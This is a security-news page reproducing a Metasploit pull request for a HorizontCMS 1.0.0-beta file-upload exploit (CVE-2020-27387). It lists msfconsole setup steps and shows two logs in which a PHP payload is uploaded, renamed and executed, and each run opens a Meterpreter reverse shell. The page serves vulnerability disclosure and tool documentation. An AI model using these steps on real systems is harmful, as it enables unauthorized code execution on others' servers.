Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-27387: Add HorizontCMS 1.0.0-beta exploit module and documentation by ErikWynter · Pull Request #14340 · rapid7/metasploit-framework

An unrestricted file upload issue in HorizontCMS through 1.0.0-beta allows an authenticated remote attacker (with access to the FileManager) to upload and execute arbitrary PHP code by uploading a PHP payload, and then using the FileManager’s rename function to provide the payload (which will receive a random name on the server) with the PHP extension, and finally executing the PHP file via an HTTP GET request to /storage/<php_file_name>. NOTE: the vendor has patched this while leaving the version number at 1.0.0-beta.

CVE
#vulnerability#ios#windows#ubuntu#linux#php#auth#ssl

About

This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed, but not in a specific version release.

Vulnerable system

HorizontCMS 1.0.0-beta and prior

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/multi/http/HorizontCMS_upload_exec
  4. Do: set RHOSTS [IP]
  5. Do: set USERNAME [username for the HorizontCMS account]
  6. Do: set PASSWORD [password for the HorizontCMS account]
  7. Do: set target [target]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: exploit

Options****PASSWORD

The password for the HorizontCMS account to authenticate with.

TARGETURI

The base path to HorizontCMS. The default value is /.

USERNAME

The username for the HorizontCMS account to authenticate with.

Targets

Id  Name
--  ----
0   PHP
1   Linux
2   Windows

Scenarios****HorizontCMS 1.0.0-beta running on Ubuntu 18.04) - PHP target

msf6 exploit(multi/http/horizontcms_upload_exec) > show options 
Module options (exploit/multi/http/horizontcms_upload_exec):
   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   test              yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                 yes       The base path to HorizontCMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   test              yes       Username to authenticate with
   VHOST      testhorizont.com  no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   PHP
msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as EaCPK1HSbRru.php...
[+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
[+] Successfully renamed payload back to EaCPK1HSbRru.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.1.227
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
[+] Successfully deleted EaCPK1HSbRru.php
meterpreter > getuid
Server username: www-data (33)
meterpreter >

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target

msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as W6nQKce4Uq.php...
[+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
[+] Successfully renamed payload back to W6nQKce4Uq.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=<command>`
[*] Sending stage (3008420 bytes) to 192.168.1.227
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
[+] Successfully deleted W6nQKce4Uq.php
meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter >

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907